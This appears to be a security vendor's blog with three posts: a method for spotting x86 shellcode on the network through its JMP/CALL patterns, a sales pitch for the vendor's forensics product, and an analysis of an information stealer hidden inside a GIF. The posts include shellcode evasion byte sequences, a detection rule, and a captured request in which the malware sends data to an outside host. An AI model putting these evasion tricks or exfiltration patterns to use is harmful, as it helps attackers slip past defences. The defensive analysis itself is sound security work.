Network detection of x86 buffer overflow shellcode

Advanced Threats, Breach, Malware Analysis, Network Forensics, Network Visbility, network forensics No Comments

Overview

This technique can detect overflow exploits against software running on the x86 platform, meaning it applies to Windows, Unix, and Mac shellcode. It not only works independently of OS, but it also works for finding both stack and heap based overflows. Most interestingly, it catches most forms of polymorphic shellcode as well. (Actually, it exceeds at finding special shellcodes like polymorphic decryption engines, egg hunters, etc.)  While this definitely doesn’t work for all shellcode, it works for a lot of it.

The reason this technique applies to any operating system on x86 is simple. Shellcode is typically written in machine code (commonly called assembly, although it’s not actually the same thing), meaning shellcode is written using processor instructions – something independent of the OS it’s running on. Of course, the entire purpose of shellcode is manipulation of the OS, so shellcode is ultimately OS specific (even patch specific), but its basic primitives are independent of the OS.

One classic problem with shellcoding is addressing. Because shellcode is [typically] nefariously injected via exploitation into a process’s memory segment, and program execution is “hijacked” (without the benefit of setting up proper address pointers), the coder doesn’t know where in memory their code will be. The problem is, very little can be accomplished without knowing the logical memory address of parameters within the shellcode.

The simplest way around this issue is use of a CALL instruction. More information is available in the “Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 2A: Instruction Set Reference, A-M” (and 2B: N-Z) located here: http://www.intel.com/products/processor/manuals/.

The CALL is used as a way to branch processor execution to another location in memory. It has the minor benefit of being able to use relative addressing, but it has the major benefit of PUSH’ing procedure linking information on the stack before branching to the target location. This is commonly referred to as Call Stack Setup. When executing a near call, the processor pushes the value of the EIP register (which contains the offset of the instruction following the CALL instruction) on the stack (for use later as a return-instruction pointer). The processor then branches to the address in the current code segment specified by the target operand.

There are several versions of the CALL instruction, but the one we’re interested in for this purpose is opcode 0xE8. This is a near call (near, meaning within the current memory segment) using relative address displacement with a negative offset (eg: backwards displacement). The actual instruction is 5 bytes long, with the last four bytes used for a relative offset (a signed displacement relative to the current value of the instruction pointer in the EIP register; this value points to the instruction following the CALL instruction). The CS register is not changed on near calls, so the results of these branches can be safely predicted (from a shellcoders perspective).

A section of a disassembled binary is shown here with an actual CALL. Notice the instruction is given as an 0xe8 plus a double word (32 bit) displacement pointer.

The CALL is usually needed early in shellcode execution to PUSH the virtual address contained in the IP onto the stack. (This is done because it’s not possible to access the IP directly, so it needs to be put on the stack to utilize parameters within the shellcode). However, the problem with the use of CALLs for call stack setup in buffer overflow shellcode is the CALL is generally located at an offset needing to serve as a return address after other instructions have already been executed. In other words, the CALL is generally located later in the shellcode and the processor executes the instructions sequentially from the start of the shellcode – unless a branching instruction is encountered.

Which is precisely how to solve the problem in shellcode – early in the execution of the shellcode, you simply JMP to the CALL in question, then call back into the shellcode and continue execution.

JMPs are simple instructions and easy to visibly identify and dissect. They are simply the opcode 0xEB followed by a byte indicating the number of bytes to jump.

The example below is taken from an MDaemon Pre Authentication Heap Overflow exploit:

In the first example above (the egghunter shellcode), we see a “\xeb\x21” which means, “Jump 0×21 (or decimal 33) bytes.” When you jump those bytes, you hit the green box, a CALL. The CALL performs the call stack setup, then branches backwards back into the shellcode and picks up just after the JMP (because of the negative displacement). The actual offset is [0xFF – 0xDA = 0x25]. 0×25 is 37 in decimal, however, you subtract 5 from that since the offset starts at the end of the 5-byte CALL. That lands us just after the JMP.

Simple, yet effective. Even analysis of polymorphic shellcode generators shows this technique applies to almost all them as well.

To summarize all this rambling, the technique (show in the FelxParser below) is simply to search for a JMP straight to a NEAR CALL with a short and negative displacement.

Evasion

Call with no offset

Evasion of JMP/CALL detection can be accomplished a number of ways. The most interesting evasions are techniques used in advanced NOP sleds obfuscation leveraging CALLs that started surfacing around the mid-2000’s.

One of the simplest CALL-based NOP substitutions worked as follows:

00000000    E800000000  call 0×5

00000005    58                           pop eax

In that example we have a CALL with no offset, which basically translates to “branch to the instruction after this CALL,” in this case an opcode that simply POPs the EIP into the EAX register. (Remember, when the CALL is hit, the processor runs through the call stack setup, meaning the EIP was just PUSHED onto the stack.) From a NOP perspective, this leaves the stack unchanged, but for a method to grab the EIP, this is a simple and efficient (although the use of NULL bytes makes this more difficult to use in a wide range of shellcode).

As that byte sequence is very rare in binaries, detecting this is much simpler since we have the benefit of a continuous 6-byet token to watch for. In the case the EIP is poped to EAX, the token is simply

0xE8 0×00 0×00 0×00 0×00 0×58

The above pattern should be extended to include all the general purpose POPs, including:

0xE8 0×00 0×00 0×00 0×00 0×58

0xE8 0×00 0×00 0×00 0×00 0×8F

0xE8 0×00 0×00 0×00 0×00 0×0F 0×1A

0xE8 0×00 0×00 0×00 0×00 0×0F 0xA9

Noir’s no JMP/CALL

This next technique was first described by noir@gsu.linux.org.tr  on the vuln-dev mailing list. It works as follows:

00000000    D9EE               fldz

00000002    D97424F4    fnstenv [esp-0xc]

00000006    58                     pop eax

In this case, the technique is to use FNSTENV to get the EIP of the last FPU instruction evaluated, then POP it from the stack. In the example above, the FLDZ FPU instruction is issued, then its EIP is POP’ed. This very cool technique allows for many permutations since any number of floating point instructions can be used.  Several dozen pages in the Intel Developers Instruction Reference A-M (starting around page 430) cover instructions that can be used in place of FLDZ.

Gera’s CALL into self

The final one we’ll look at is a crafty method to avoid JMP/CALLs, and works like this:

00000000    E8FFFFFFFF  call 0×4

00000005    C3                        ret

00000006    58                        pop eax

The interesting thing is the code above does not perform the actions the disassembler has labeled them as doing. In reality, the CALL (E8FFFFFFFF) is calling backwards into itself by a single byte. Therefore, the processor will hit the byte 0xFF (the tail end of the CALL) and interpret that byte as an instruction. In this case, the instruction is an INC/DEC (increment by 1 or decrement by 1). The 0xC3 is actually an operand to the interpreted 0xFF instruction, so it’s not a RET (return, normally used for call stack unwinding) in this case – it’s actually a pointer to the value stored in the EBX register as an operand for the INC/DEC instruction! After this step has been taken (the equivalent of a NOP really), the value on the stack is POP’ed into the EAX register using the 0×58 instruction. The value POPed is the EIP since it was PUSHed onto the stack when the CALL called back into itself.

While this is a very cool technique, it also provides a number of simple tokens to match on, similar to the Call with no offset example.

False positives and benign triggers

In testing of 55 GB of data (network and host based) no false positives were encountered searching for a JMP to short and near negative CALL. However, benign triggers were encountered (meaning the condition was detected, but it was a valid use of the condition). The condition was only detected inside some valid PE files, and because of that fact, they can be filtered using a number of simple and easy techniques depending on the technology used to discover them.

Flex Parser

Currently, the parser engine does not allow for one-byte tokens, so this parser is not functional as-is. (The concept presented here can easily be extended to identifying percent-encoded shellcodes, which is supported since they are represented as multi-byte tokens.) Nonetheless, and more importantly, the technique is annotated here in Flex so the reader can see how simple it is to write FlexParsers to discover a wide array of very complex conditions – such as universal shellcode detection.

<parser name=”exploit_x86_shellcode” desc=”exploit_x86_shellcode”>

<!– declaration section holds all variables used down
in the <match> section –>
<declaration>

<!– this parser will output messages to suspicious risk catergory –>

<meta format=”Text” key=”risk.suspicious” name=”suspicious”/>

<!– parser logic will hit on every 0xeb encountered
this is exactly why single-byte tokens are not supported,
but I’ll show it here anyways! –>

<token name=”jmp” value=”&#xeb;”/>

<!– some numbers we’ll use for testing below–>

<number name=”num_jmp_offset” scope=”session”/>
<number name=”num_call_1″ scope=”session”/>
<number name=”num_call_2″ scope=”session”/>
<number name=”num_call_3″ scope=”session”/>

</declaration>

<!– enter the below node when the pattern held in “jmp” is found–>

<match name=”jmp”>

<!– read the next byte and store the value in num_jmp_offset–>

<read length=”1″ name=”num_jmp_offset”>

<!– move the value stored in num_jmp_offset –>

<move direction=”forward” value=”$num_jmp_offset”>
<move direction=”forward” value=”1″>

<!– read the next byte, if it is 0xe8 (decimal 232),
then continue –>

<read length=”1″ name=”num_call_1″>
<if name=”num_call_1″ equal=”232″>

<!– skip low-order address byte –>

<move direction=”forward” value=”1″>

<!– check others for values 0xff’s, meaning we’re not going
far in this code–>

<read length=”1″ name=”num_call_2″>
<if name=”num_call_2″ equal=”255″>
<read length=”1″ name=”num_call_3″>
<if name=”num_call_3″ equal=”255″>

<!– if we get here, add the tag “exploit_x86_shellcode”
to the suspicious catergory for this session–>

<register name=”suspicious” value=”exploit_x86_shellcode”/>

</if>
</read>
</if>
</read>
</move>
</if>
</read>
</move>
</move>
</read>
</match>
</parser>

A Bucket of Sand?

Competitor Hype, Network Visbility, network forensics 2 Comments

Did NetWitness actually release a new product that consists of a bucket filled with sand? The answer is yes, but the real question is why? We released B.O.S. in an attempt to sound the wake-up call…

Organizations can no longer afford to rely so heavily on perimeter based technologies, on signatures for identification of threats – and they cannot hide their heads in the sand and hope that nothing goes wrong.  Every day, things are going incredibly wrong.   Prevention alone is an epically failing strategy.

2009 can easily be called the year of advanced threats. The scary thing is that the same can be said for every year over the last five. Despite all efforts, attacks and data losses are getting progressively worse, not better.  During the past five years there have been thousands of breaches reported - impacting state and local government, small and medium sized businesses, multi-national organizations and some of the most sensitive branches of the U.S. Government.   No one is immune and the sickness is literally life threatening.

Imagine for a moment how many breaches went unreported…imagine how many have gone completely undetected.  This is a frightening reality highlighted by the 2009 Verizon Business Data Breach report which found that 49% of breaches went undiscovered for a period of months…and 70% of breaches went completely undetected by internal teams. How is this possible?

The answer is both simple and frightening – the technologies on which organizations have come to rely  aren’t able to prevent, detect, and combat the advanced threats of 2010.

Today’s security technologies are better suited for fighting the cyber-war of 1995 than they are for dealing with today’s advanced threats. The cyber-criminal underground and nation-sponsored groups are using teamwork, custom-developed malware, third-party vulnerabilities via exploit kits, and code obfuscation to bypass existing security technologies and perceptions of security derived from compliance efforts. Because of the industry’s overreliance on signature based technologies, security managers are under the false assumption that they are protected. Too much faith has been placed in firewalls, IDS/IPS, anti-virus, anti-spam and other perimeter platforms to catch the threats.  The current cyber war footing is analogous to bringing a knife to a gun battle – security leaders are reliant upon technologies designed to fight the cyber-war of 10 years ago…our adversaries are fighting with weapons of today.

So, what can be done?

In today’s threat environment it is vitally important that all organizations develop an effective, real-time capability to detect, analyze and respond rapidly to advanced threats.  During the last three years, many of the top security teams in the government and commercial sectors have turned to the advanced threat intelligence and real-time network forensics provide by NetWitness NextGen. The only way to truly know what is going on within the network is to look at everything that is going on within the network. Full packet capture and session recreation are the only ways to accomplish this end.  Where NetWitness NextGen is deployed, the result is an effective threat intelligence program and continuous augmented awareness that provides in-depth visibility into network events that escape existing network security monitoring tools.

In 2010, you should not be buying a bucket of sand.  To combat the advanced threats we now face, organizations must:

1) Reject “status quo” and compliance-focused thinking and acknowledge that prevention is a failing strategy when facing advanced threats;

2) Focus on real-time detection and rapid investigation of advanced attacks to shorten the risk exposure window of any incident;

3) Build an internal security team that is tailored for advanced threat detection and that is armed with an enterprise-wide, real-time, network forensics capability to achieve optimal network visibility…

In short…when looking to combat advanced threats, organizations should be using NetWitness NextGen.

The Power of Realtime Network Forensics – Advanced Malware Detection

Network Visbility, network forensics No Comments

Hey gang…Alex here…writing from the NetWitness Labs…

At NetWitness, our focus is on providing analytics, and we are constantly looking at new ways to apply our unique analytics to the realm of content development.  We know that we have really cool technology and want to showcase that as well as push the envelope of what is possible in this space.   If you’ve seen the recent rule update on the freeware welcome page you are seeing the results of these efforts first hand.

If you’ve been following the threat landscape for the past few years, you will know without question that malware is a key part of both cybercrimal and nation-state hacking activity.   You also know that current security technologies are woefully inadequate in detecting targeted and obfuscated malware.  Keeping a network secure requires knowledge of normalcy on your network as well a cutting edge technology to quickly make you aware of deviations from this normalcy.

Part of this concept is using knowledge of what’s “normal” to define what’s “abnormal”.   In this example I’ll use windows executables.  We know from common IT knowledge that windows executables often end with an “.exe” extension (among others).   Those with a forensic background also know that Windows executables are forensically identifiable by looking for a file signature that includes common “tells”.   An example of this is the PE file header,  commonly refereed to as “MZ”.

If I take these existing bits of knowledge and combine them, I have the basis for a detection of “abnormal” executables as follows:

“If forensic signature equals windows executable,  but the file extension doesn’t equal a known executable extension, let me know about it!”

With this concept in mind, one of my extremely talented coworkers (Gary Golomb), put together a flex parser with the sole purpose of detecting file signatures on the wire.   Think of a forensic analysis of filetypes using a dedicated host forensic tool like Encase or Forensic Tool Kit, but on the network and in real-time.   We’ve been testing this parser in various scenarios as warranted, and recently made an interesting discovery while at a client site.

During this engagement, we began investigating hits on our “file signature windows executable” parser, which is designed to generate “alert” metadata in the NetWitness framework when it detects forensic executable tells.

Alert Rule Hit!

Meet 343njpl.jpg:

One of the files that triggered this alert was the following file, which was downloaded from the “tinypic.com” file hosting service and was named 343njpl.jpg:

Hidden File

When I look at this file forensically,  I see an interesting inconsistency.   The file header identifies the file as a GIF, not a JPG.  Something is amiss!

Not a JPG at all!

Digging further…I see that there is, in fact, an executable file header buried in the file:

Exe Header

What’s interesting to note here, is that this file renders as a GIF correctly in a web browser, so if you were to wander across it during an investigation, it would not be readily apparent that it is hiding an executable.

With this new knowledge,  We then submitted the file to virustotal to determine if it is known malicious.   The results were not promising, with 3 detections out of 41:

http://www.virustotal.com/analisis/073a4210835e026712e5aa08e18004eabe9c8c4dc7b4565db47a34e38b565b8b-1258144380

At this point we really wanted to dig deeper and figure out what this file is trying to do,  so we opened the file in a hex editor and carved the EXE out of the file, then resubmitted to virustotal…results were much better this time, but still only about 65% with 27 out of 41 detections.

http://www.virustotal.com/analisis/0ccfe86dc2ab9cd8b9f589bae6666c903af8de2ee2bfcce4dc8464346b4e761a-1256743615

Ok…so we know that this file is indeed malicous now.  So what does it actually do?    If we use some malware analysis techniques, we discover that this initially reports installed applications to a webserver in the netherlands:

POST /65/logpl.php HTTP/1.1
Referer: http://google.com/
Content-Type: application/x-www-form-urlencoded
User-Agent: hello
Host: www2.sexown.com
Content-Length: 692
Cache-Control: no-cache

pl=plV:1.1|Adobe_Flash_Player_10_ActiveXV:10.0.22.87|Explorer_Suite_III|IDA_Pro_D
emo_v5.4|InstallWatch_Pro_2.5|Malcode_Analyst_Pack_v0.21|Microsoft_.NET_Framework
_3.5_SP1|Mozilla_Firefox_(3.5)V:3.5 (en-US)|Notepad++V:5.4.4|Paros_3.2.13|Windows
_XP_Service_Pack_3V:20080414.031525|WinPcap_4.1_beta5V:4.1.0.1452|Wireshark_1.2.0
V:1.2.0|Mandiant_Red_CurtainV:1.0.0|Python_2.6.2V:2.6.2150|Java(TM)_6_Update_14V:
6.0.140|WebFldrs_XPV:9.50.7523|Mandiant_Web_HistorianV:1.3.0|Mandiant_Highlighter
V:1.1.1|MemoryzeV:1.3.1000|Microsoft_.NET_Framework_3.0_Service_Pack_2V:3.2.30729
|Microsoft_.NET_Framework_2.0_Service_Pack_2V:2.2.30729|Microsoft_.NET_Framework_
3.5_SP1V:3.5.30729|VMware_ToolsV:7.9.6.5197|

So let’s review the facts:

- A file that strays from the expected norm is detected by NetWitness technology, being served from a common file hosting site.

- This file properly renders as a GIF in a web browser, but contains an embedded executable.

- Malware detection on this sample in its embedded form is dismal, but gets better when the executable is extracted from the GIF.

- Using behavioral analysis, we can determine that the attached executable is an information stealer, at the very least.

Tied to an alerting mechanism in Netwitness Informer, we could have this alert sent directly to an enterprise SOC for response, informing them of unusual executable behavior, without having to rely on signature-based malware controls!

NetWitness….letting you see your network like never before.   :)